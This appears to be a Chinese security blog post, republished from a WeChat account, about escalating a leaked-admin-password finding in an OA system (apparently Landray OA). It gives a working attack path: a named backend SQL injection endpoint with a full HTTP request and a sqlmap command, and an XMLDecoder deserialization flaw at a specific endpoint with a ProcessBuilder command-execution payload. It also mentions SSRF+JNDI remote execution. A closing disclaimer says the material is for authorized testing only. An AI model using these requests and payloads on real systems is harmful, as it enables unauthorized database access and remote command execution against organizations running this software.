任意文件读取漏洞我们到底能干嘛?-续集

admin 2022年5月29日15:12:39安全工具评论14 views2367字阅读7分53秒阅读模式

     今日群里一直在讨论关于上次关于某OA系统的配置文件密码泄露,然后是否可以进一步操作。(群里师傅的意思应该是日穿)


      群里有个师傅说不知道该如何进行下一步,这里分析一波具体有两种情况,一种admin 密码无法登录后台

任意文件读取漏洞我们到底能干嘛?-续集

但是能登录系统配置,应该是有设置


任意文件读取漏洞我们到底能干嘛?-续集

       这种情况下直接利用SSRF+JNDI远程命令执行这个 就不先不讲了,因为已经有师傅在发了。上次也提到过了。


第二种就好办了 后台能够登录的

任意文件读取漏洞我们到底能干嘛?-续集

这里提供两个方案,

第一 后台sql注入, 注入点如下:

https://xxx.xxx.xxx.xxx/km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true

它的SQL注入的参数为 ordeby ,数据包如下

GET /km/imeeting/km_imeeting_res/kmImeetingRes.do?contentType=json&method=listUse&orderby=1&ordertype=down&s_ajax=true HTTP/1.1Host: xxx.xxx.xxx.xxxUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:88.0) Gecko/20100101 Firefox/88.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: JSESSIONID=0C759C299DE70CDB04A422EE4CD9C6A3; LtpaToken=AAECAzYwOUFBMDExNjA5QjJDQjFhZG1pbjhekJ9xmjrx7JnRz9kfd5LmOvs9Upgrade-Insecure-Requests: 1

直接保存为txt放到sqlmap里面跑起来

sqlmap -r sql.txt -p orderby --dbs

任意文件读取漏洞我们到底能干嘛?-续集

第二种 直接任意文件写入 

细节如下

漏洞在/sys/search/sys_search_main/sysSearchMain.do 下面

这里也给出了 method 为 editrParam。参数为 FdParameters

在 com.landray.kmss.sys.search.jar 中的

com.landray.kmss.sys.search.actions.SysSearchMainAction 类。

method 为 editrParam。 (护网期间期间的经分析是后台洞源码内容就不贴出来了)github上也会有介绍

典型的 xmlDecoder 反序列化。整体流程只对FdParameters 的内容进行了一些内容替换。导致 xmlDecoder 反序列化漏洞。本地 POC:Xmldecoder payload 生成https://github.com/mhaskar/XMLDecoder-payload-generator

尝试打开这里尝试打开文稿 pages.app

任意文件读取漏洞我们到底能干嘛?-续集

Code:

<?xml version="1.0" encoding="UTF-8"?> <java   version="1.7.0_21" class="java.beans.XMLDecoder"> <void   class="java.lang.ProcessBuilder"> <array   class="java.lang.String" length="2"><void   index="0"><string>open</string></void><void   index="1"><string>/Applications/Pages.app</string></void></array> <void method="start" id="process"> </void> </void></java>

至于为什么说是后台洞 因为只开放了以下几个白名单

/login.jsp*;  /resource/ ;  /service/ ;  / /.index; /logout*; /admin.do*; /browser.jsp*;   is/; /kk; /forward.html*; /sys/webservice/*; /vcode.jsp;

    可以看出来是一个任意文件读取,可以衍生出很多个玩法,这里真的只是小小的一部分了,还有更多师傅在群里也提出了自己的想法,就不一一表述了,非常感谢这些师傅的讨论。不过还是希望大家多多复现,尝试一些新思路新套路,但是这一切都应该是建立在有授权的情况,未授权的还是不要折腾了。还是那句话 年轻人要讲武德

   

    为各位师傅提供讨论的地方,可以后台回复加群  让管理拉您进群 欢迎各位师傅加入。感谢各位师傅对我的关照。技术有限还需要多多仰仗各位师傅的加入! 

 

特别声明:

由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,我不为此承担任何责任。


作者有对此文章的修改和解释权。如欲转载或传播此文章,必须保证此文章的完整性,包括版权声明等全部内容。未经作者的允许,不得任意修改或者增减此文章内容,不得以任何方式将其用于商业目的。 切勿用于非法,仅供学习参考


我不会渗透,我们下次再见!


原文始发于微信公众号(深夜笔记本):任意文件读取漏洞我们到底能干嘛?-续集

特别标注: 本站(CN-SEC.COM)所有文章仅供技术研究,若将其信息做其他用途,由用户承担全部法律及连带责任,本站不承担任何法律及连带责任,请遵守中华人民共和国安全法.
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年5月29日15:12:39
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                  任意文件读取漏洞我们到底能干嘛?-续集 http://cn-sec.com/archives/758804.html

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: